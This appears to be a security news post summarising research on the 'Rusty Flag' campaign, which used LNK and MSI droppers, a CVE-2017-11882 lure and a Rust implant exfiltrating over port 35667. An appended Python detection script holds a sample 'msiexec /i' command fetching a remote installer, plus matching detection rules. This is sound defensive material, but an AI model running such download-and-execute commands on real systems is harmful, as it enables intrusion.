Operation Rusty Flag is a malicious campaign against Azerbaijani targets

Carding

Deep Instinct researchers have discovered an attacker targeting Azerbaijani organisations, using decoys related to the military conflict in Nagorno-Karabakh to infect their systems with new Rust-based malware.

The campaign was named Rusty Flag and had at least two different initial access vectors; one of the lures was a modified version of a document used by the Storm-0978 group.

But, as the researchers believe, this is more indicative of a false-flag attack.

Initially, Deep Instinct detected a malicious LNK file with a low detection rate, named "1. KARABAKH.jpg.lnk", which displays an image related to the military incident in Nagorno-Karabakh.

The LNK downloads and runs an MSI installer hosted on Dropbox, which contains the Rust-based implant, a scheduled task XML file, and the decoy image file.

Another MSI file was then found, containing a different version of the same Rust implant, but the initial access vector for this campaign was harder to determine.

The Dropbox URL was masked with a URL shortener (hxxps://t[.]ly/8CYQW).

The file Overview_of_UWCs_UkraineInNATO_campaign.docx, which sent a request to this URL, could not be accessed.

Moreover, this file name and its contents were associated with the Storm-0978 campaign exploiting CVE-2023-36884, and the sample even had a corresponding comment on VirusTotal.

Upon further investigation, however, it turned out to be a different file: the embedded afchunk.rtf had been replaced, and the mentioned CVE was not used.

Instead, CVE-2017-11882 was exploited to download and install the MSI file. All this, according to the researchers, looks like a deliberate attempt to link the attack to Storm-0978.

Even though the original decoy was an Office file, the delivered MSI also opened a decoy file in PDF format. Each attack had its own unique file names and metadata.

Although the initial vectors differed, execution in both variants proceeded the same way. After launch, the implant slept for 12 minutes, a well-known technique to evade security research and simple sandbox analysis.

It then collected information about the infected machine, encrypted it, and sent it to the attacker's server over an unusual, hard-coded port, 35667.
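As an added example (not code from the Deep Instinct report or this post), a small Python triage script that scans constructed Sysmon-style events for three of the behaviours described above: msiexec.exe launched with a remote URL, a scheduled task registered by an MSI-spawned process (an assumed mechanism, since the post only says the MSI carries a task XML), and outbound traffic to the hard-coded port 35667. The event layout, process names, IP addresses and the shortener URL are all constructed placeholders.

```python
import re

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c start "" "1. KARABAKH.jpg.lnk"'},
    {"type": "process", "parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i https://t.ly/PLACEHOLDER /qn"},   # shortener URL is a placeholder
    {"type": "process", "parent": "msiexec.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /xml C:\\Users\\Public\\task.xml /tn Updater"},
    {"type": "network", "image": "implant.exe", "dst_ip": "203.0.113.10", "dst_port": 35667},
    {"type": "network", "image": "chrome.exe", "dst_ip": "203.0.113.20", "dst_port": 443},
    # Benign: a local MSI install from disk should not be flagged.
    {"type": "process", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Installers\\vendor.msi /qn"},
]

# msiexec pointed at an http(s) URL rather than a local package path.
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\s+.*\bhttps?://", re.IGNORECASE)
# Hard-coded exfiltration port reported for the Rusty Flag implant.
C2_PORT = 35667


def find_findings(events):
    """Return (rule_name, evidence) tuples for events matching the campaign's TTPs."""
    findings = []
    for e in events:
        if e["type"] == "process":
            image = e["image"].lower()
            parent = e["parent"].lower()
            if image == "msiexec.exe" and REMOTE_MSI.search(e["cmdline"]):
                findings.append(("msiexec_remote_url", e["cmdline"]))
            # Assumption: the bundled task XML is registered via schtasks from the installer.
            if parent == "msiexec.exe" and image == "schtasks.exe":
                findings.append(("msi_creates_scheduled_task", e["cmdline"]))
        elif e["type"] == "network" and e["dst_port"] == C2_PORT:
            findings.append(("unusual_port_35667",
                             f'{e["image"]} -> {e["dst_ip"]}:{e["dst_port"]}'))
    return findings


if __name__ == "__main__":
    for rule, evidence in find_findings(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```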

Deep Instinct researchers were unable to attribute these attacks to any known actor, and both Rust implants had zero detections when first uploaded to VirusTotal.

So someone's ongoing attempt to simulate cyberattacks on Azerbaijan by groups attributed to Russia might have had a chance of success, if not for Deep Instinct's report.

But, as practice shows, such links sometimes turn into 404s; for now, the IOCs and MITRE mapping are in place in the report.